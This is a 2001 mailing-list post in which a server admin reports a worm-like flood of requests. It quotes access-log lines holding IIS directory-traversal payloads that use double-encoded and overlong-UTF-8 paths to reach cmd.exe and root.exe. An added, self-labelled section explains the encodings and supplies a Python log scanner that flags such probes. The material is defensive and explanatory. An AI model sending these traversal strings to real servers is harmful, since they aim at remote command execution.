
BLU Discuss list archive



new worm/virus???



My web server is getting slammed with GET requests for cmd.exe, root.exe, 
etc.  It started this morning at 9:30am, and has been constant, and from 
all different sources.  I can't find any news on the web.  Does anyone 
know what's going on?

Below (and attached, to preserve line breaks) is a clip from my web logs. 
It shows all the various GET attempts from one source (nt1.mdc.net).  
I've informed mdc.net (a.k.a. "Netway" in N. Andover), but the attacks 
are widespread.



nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:19 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1286


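The requests in the log clip above are URL-encoded directory-traversal probes aimed at IIS: the "/" and "\" separators are hidden behind double percent-encoding (%252f, %25%35%63, %%35c) or overlong two-byte UTF-8 (%c0%af, %c1%9c, %c0%2f, %c1%1c) so that a naive path check does not see "../", while the target is always winnt/system32/cmd.exe or a root.exe copy. What follows is an added example, not code from the original post or its attachment: a small Python detector that parses common-log-format lines, decodes the request path the way a permissive server would (repeated percent-decoding plus folding of overlong sequences), and flags the probes per source host. The sample log lines inside it are constructed to mirror the quoted clip; the function names and flag labels are this example's own.

```python
"""Flag cmd.exe / root.exe traversal probes in Apache common-log lines.

Added example; the SAMPLE_LOG below is constructed to match the shape of
the log clip in the post, it is not a real capture.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample lines (same format as the post's clip).
SAMPLE_LOG = """\
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1286
10.0.0.5 - - [18/Sep/2001:09:53:00 -0400] "GET /index.html HTTP/1.0" 200 5120
"""

# The binaries every probe in the clip asks for.
TARGET_RE = re.compile(r'/(?:cmd|root)\.exe(?:$|/)', re.IGNORECASE)


def lenient_utf8(raw):
    """Decode bytes like a permissive decoder; return (text, overlong_seen).

    A two-byte sequence with lead byte 0xC0/0xC1 is overlong: C0 AF is '/'
    and C1 9C is '\\'. Strict decoders reject it, which is exactly why a
    naive check misses it, so fold it to the ASCII byte it smuggles and
    report that it happened. Other malformed bytes become U+FFFD.
    """
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong = True
            i += 2
        else:
            n = 2 if 0xC2 <= b <= 0xDF else 3 if 0xE0 <= b <= 0xEF else 4 if 0xF0 <= b <= 0xF4 else 1
            try:
                out.append(raw[i:i + n].decode('utf-8')); i += n
            except UnicodeDecodeError:
                out.append('\ufffd'); i += 1
    return ''.join(out), overlong


def normalize_path(path, max_rounds=3):
    """Percent-decode until stable; return (normalized, rounds, overlong_seen).

    unquote_to_bytes leaves a malformed escape such as '%%35c' as a literal
    '%', so the next round turns the '%5c' it produced into a backslash.
    rounds >= 2 means the path was double-encoded.
    """
    cur, overlong_any, rounds = path, False, 0
    for _ in range(max_rounds):
        text, overlong = lenient_utf8(unquote_to_bytes(cur))
        overlong_any |= overlong
        if text == cur:
            break
        cur, rounds = text, rounds + 1
    return cur.replace('\\', '/'), rounds, overlong_any


def scan_log(text):
    """Return one finding dict per line that looks like a cmd.exe/root.exe probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path = m['path'].split('?', 1)[0]  # drop the ?/c+dir argument
        norm, rounds, overlong = normalize_path(raw_path)
        flags = []
        if TARGET_RE.search(norm):
            flags.append('cmd/root.exe')
        if '/../' in norm:
            flags.append('traversal')
        if rounds >= 2:
            flags.append('double-encoded')
        if overlong:
            flags.append('overlong-utf8')
        if flags:
            findings.append({'host': m['host'], 'path': m['path'], 'normalized': norm,
                             'status': int(m['status']), 'flags': flags})
    return findings


def probes_by_host(findings):
    """Count flagged requests per source host, for the abuse report."""
    counts = defaultdict(int)
    for f in findings:
        counts[f['host']] += 1
    return dict(counts)


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f['host'], f['status'], f['normalized'], ','.join(f['flags']))
    print(probes_by_host(found))
```

The key design point is decoding the path yourself from bytes: `urllib.parse.unquote()` would turn %c0%af into two U+FFFD characters and the traversal would vanish from the normalized string, whereas the probe relied on a server that accepted the overlong byte pair as "/". Run it against a real access log by replacing SAMPLE_LOG with the file contents; the 400 responses in the clip are caught the same way as the 404s because the decision is made on the decoded path, not on the status code.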
